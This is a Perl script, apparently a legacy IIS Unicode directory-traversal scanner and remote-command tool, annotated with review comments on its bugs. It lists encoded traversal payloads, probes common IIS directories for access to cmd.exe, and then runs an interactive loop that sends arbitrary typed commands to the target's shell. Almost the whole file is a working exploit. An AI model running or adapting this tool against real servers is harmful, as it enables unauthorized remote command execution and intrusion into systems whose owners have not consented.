#!/usr/bin/perl -w

# Unicode Scanner by backslash of WoH
# edited from b-r00t's unicode-shell.pl
# always scan port 80 

use strict;
use IO::Socket;

# Shared state. None of the subs below take arguments: they all read and
# write these file-scope globals, so the order in which they are called matters.
my $host;               # target name/address, read from STDIN by &host and passed unvalidated to PeerAddr
my $port=80;            # fixed; never read from input (see header comment)
my $command;            # text appended to the request line by &connect ("dir" during &scan)
my $url;                # traversal sequence + $hello picked in &choose
my $path="";            # directory prefix picked in &path
my $hello="winnt/system32/cmd.exe?/c+"; # suffix that every probe and command request ends with
my @results;            # response lines stored by &connect (see the notes there: never cleared, first line dropped)
my $probe;              # "string" (HEAD fingerprint), "scan" or "command": selects what &connect sends
my @U;                  # candidate traversal encodings; index 0 is never set, so loops start at 1
my $backslash="";       # request path sent by &connect (prefix + traversal + $hello, or free text from &other)
my @list=("/","/msadc/","/scripts/","/wwwroot/","/cgi-bin/","/_vti_bin/","/_vti_adm/","/_vti_aut/","/_vti_cnf/","/iisadminpwd/"); # prefixes tried by &scan; &path's menu is meant to mirror this order

# Encodings 1..18. Note the duplicates: $U[8] repeats $U[2], and $U[16] is
# assigned twice below, so the upper-case variant on the first line is
# overwritten and never tried. The "\%" escapes in $U[18] are passed through
# as plain "%" (with a warning under -w), making it equal to the kept $U[16].
$U[1] = "..%c0%af../";
$U[2] = "..%c1%9c../";
$U[3] = "..%c1%pc../";
$U[4] = "..%c0%9v../";
$U[5] = "..%c0%qf../";
$U[6] = "..%c1%8s../";
$U[7] = "..%c1%1c../";
$U[8] = "..%c1%9c../";
$U[9] = "..%c1%af../";
$U[10] = "..%e0%80%af../";
$U[11] = "..%f0%80%80%af../";
$U[12] = "..%f8%80%80%80%af../";
$U[13] = "..%fc%80%80%80%80%af../";
$U[14] = "..%c1%9c..%c1%9c..%c1%9c../";
$U[15] = "..%c0%af../..%c0%af../..%c0%af../";
$U[16] = "..%C0%AF../..%C0%AF../..%C0%AF../";
$U[16] = "..%e0%80%af../..%e0%80%af../..%e0%80%af../";
$U[17] = "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../";
$U[18] = "..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../";

# Entry point: banner, then the host -> fingerprint -> scan sequence.
# Every path out of &slash0r ends in &exit (die) or in &slash0r calling itself.
&title;
&slash0r;

sub slash0r {
        # One full pass: prompt for the target, fingerprint it, then scan it.
        # Each step communicates through the file-scope globals, not return values.
        host();
        server();
        scan();
}

sub host {
        # Reads the target from STDIN into the global $host. No validation is
        # done here; the value goes straight into the socket's PeerAddr later.
        print "\nHost : ";
        my $typed = <STDIN>;
        chomp $typed;
        $host = $typed;
}

sub server {
        # Fingerprint step: sends a HEAD / via &connect and looks for "IIS" in
        # any returned line. On a miss the user may abort through &exit.
        print "\nTrying to obtain IIS Server string ...\n";
        $probe = "string";
        my $webserver = "something";
        &connect;
        # @results is filled (and printed) by &connect for the "string" probe.
        for my $line (@results) {
                $webserver = "iis" if $line =~ /IIS/;
        }
        if ($webserver eq "iis") {
                print "\nOK ... It Seems To Be Micro\$hit IIS.";
        }
        else {
                print "\a\a\n\n";
                print "\nThis Server may not be running Micro\$oft IIS WebServer";
                print "\nDo You Wish To Cont ... [Y/N]";
                my $answer = <STDIN>;
                chomp $answer;
                if ($answer =~ /N/i) { &exit }
        }
}

sub scan 
{
        # Tries every encoding in @U under every prefix in @list and prints the
        # combinations whose response contains "Directory". Depends on &connect
        # filling @results and on the globals $backslash, $command and $probe.
        my $status = "not_vulnerable";
        print "\nScanning Webserver $host on port $port ...";
        my $loop;
        my $output;
        my $flag;
        my $slash;
        $command="dir";                 # appended to every probe request by &connect
        foreach $slash (@list)
        {
		print "\npath : $slash";
		print "\nvulnerable on url no : ";
                for ($loop=1; $loop < @U; $loop++) # $U[0] is unset, hence the start at 1
                { 
                        $flag = "0";
                        $backslash = ($slash.$U[$loop].$hello);
                        $probe = "scan";        # &connect sends GET but does not print for "scan"
                        &connect;
                        # NOTE(review): &connect never clears @results, so an empty
                        # response leaves the previous probe's lines in place and the
                        # match below can credit the wrong encoding.
                        foreach $output (@results)
                        {
                                if ($output =~ /Directory/) # presumably the "Directory of" line of a dir listing
                                {
                                      $flag = "1";
                                      $status = "vulnerable";
                                };
                        };
          
                        if ($flag eq "0") 
                        {    
                         }
                        else
                        {
                                print "\n$loop. $host$slash$U[$loop]$hello\a";
                        };
                };
        };
        if ($status eq "not_vulnerable"){
                                        print "\n\n$host not vulnerable.\n\n\a\a";
					&slash0r;       # starts over at the host prompt; recursion, never returns here
	                                      }
	else{
		print "\a\n";
        	&command;       # &command only leaves via &exit (die), so the next call appears unreachable
		&choose;
	};
}; 

sub choose {
        # Prompts for an index into @U and builds $url from it; 0 hands off to &other.
        # NOTE(review): the two re-prompts recurse but do not return, so once the
        # nested call comes back the original (invalid) $choice is still processed.
        print "\nURL To Use [0 = Other] : ";
	my $choice=<STDIN>;
        chomp $choice;
        if ($choice > @U){ &choose; };      # numeric test runs before the \D check, so letters warn here; @U holds 19 slots (0..18), so 19 passes and indexes an unset slot below
        if ($choice =~/\D/g ){ &choose; };  # non-numeric input; /g adds nothing in this scalar-context match
        if ($choice == 0){ &other; };
	if ($choice != 0){
	$url = ($U[$choice].$hello);
 	&path;}
}; 

sub path {
	# Menu of directory prefixes; sets $path and $backslash for the chosen one.
	# NOTE(review): the menu text disagrees with @list at index 0: $list[0] is
	# "/" while the menu shows "/_vti_cnf/" (which is really index 8). As in
	# &choose, the re-prompts below recurse without returning.
	$path="";
	print "\n ##################### \n";
	print " PATH DESCRIPTION :\n";
	print " 0. /_vti_cnf/\n";
	print " 1. /msadc/\n";
	print " 2. /scripts/\n";
	print " 3. /wwwroot/\n";
	print " 4. /cgi-bin/\n";
	print " 5. /_vti_bin/\n";
	print " 6. /_vti_adm/\n";
	print " 7. /_vti_aut/\n";
	print " 8. /_vti_cnf/\n";
	print " 9. /iisadminpwd/\n";
	print " ##################### \n";

	print "\nPATH To Use [10 = Other] : ";
        my $ch0ice=<STDIN>;
        chomp $ch0ice;
	if ($ch0ice > @list){ &path; };     # @list has 10 entries, so 10 passes here and is treated as "Other" below
	if ($ch0ice =~/\D/g ){ &path; };
	if ($ch0ice == 10){ &other };       # &other sets $backslash straight from STDIN
	$path = $list[$ch0ice];             # undef (with a warning) when $ch0ice is 10
	if ($ch0ice != 10){
		$backslash=($path.$url);};
	print "HTTP://$host$backslash";	
}

sub other {
        # Free-form escape hatch: whatever is typed becomes the request path
        # ($backslash) verbatim, with no checking.
        print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/c+"; 
        print "\nHTTP://$host";
        chomp(my $typed = <STDIN>);
        $backslash = $typed;
}

sub command {
        # Interactive loop: reads a line, rewrites whitespace to "+", and has
        # &connect send it appended to $backslash. Entered from &scan with
        # $command already set to "dir".
        # NOTE(review): on STDIN EOF $command becomes undef, which never matches
        # /quit/, so the loop appears to spin and keep calling &connect. "HELP"
        # is advertised in the prompt but not handled; it is sent like any command.
        while ($command !~/quit/i) {
                print "\nHELP QUIT SCAN URL Or Command eg dir C: ";
                print "\nCommand : ";
                $command = <STDIN>;
                chomp $command;
                if ($command =~/quit/i) { &exit };
                if ($command =~/url/i) { &choose }; 
                if ($command =~/scan/i) { &slash0r };
                $command =~ s/\s/+/g; # whitespace becomes "+" (query-string form); it is not removed
		if ($command =~/quit|url|scan/i){}else{
                print "\nHTTP://$host$backslash$command";};
                $probe = "command";
                # NOTE(review): this match is case-sensitive, unlike the three above, so
                # e.g. "URL" reaches &choose and is afterwards also sent as a request.
                if ($command !~/quit|url|scan/) {&connect};
        };
        &exit;
};

sub connect 
{
        # Opens a fresh TCP connection per call, sends the one request selected
        # by $probe, and reads the response into @results. The name shadows the
        # connect builtin, so callers must spell the call as "&connect".
        my $connection = IO::Socket::INET->new (
                                        Proto => "tcp",
                                        PeerAddr => "$host",    # set from STDIN in &host, unvalidated
                                        PeerPort => "$port",
                                        ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n"; # aborts the whole program, unlike the prompts elsewhere
        $connection -> autoflush(1);
        if ($probe =~/command|scan/)
        {
                print $connection "GET $backslash$command HTTP/1.0\r\n\r\n";   # HTTP/1.0, no Host header
        }
        elsif ($probe =~/string/) 
        {
                print $connection "HEAD / HTTP/1.0\r\n\r\n";
        };

        # NOTE(review): the while condition reads the first response line (the
        # status line) into $_ and discards it; the slurp inside stores the rest.
        # @results is never cleared, so an empty response leaves the previous
        # call's lines in place for the caller to inspect.
        while ( <$connection> ) 
        { 
                @results = <$connection>;
        };
        close $connection;      # return value not checked
        if ($probe eq "command")
        { 
                &output 
        };
        if ($probe eq "string") # "scan" responses are only examined by &scan, never printed
        { 
                &output 
        };
};  


sub output {
        # Echoes the lines &connect stored in @results, one per second.
        print "\nOUTPUT FROM $host.\n";
        for my $line (@results) {
                print $line;
                sleep 1;        # pacing between lines, kept from the original
        }
}

sub title {
        # Start-up banner; printed once before the first host prompt.
        my @banner = (
                "\nunicode scan0r by backslash",
                "\nedited from b-r00t's unicode-shell",
                "\n",
        );
        print @banner;
}

sub exit {
        # Program-wide bail-out: dies with a bell and a trailing newline, so no
        # "at FILE line N" suffix is appended. Shadows the exit builtin; callers
        # reach it only via "&exit".
        my $farewell = "\a\n";
        die $farewell;
}

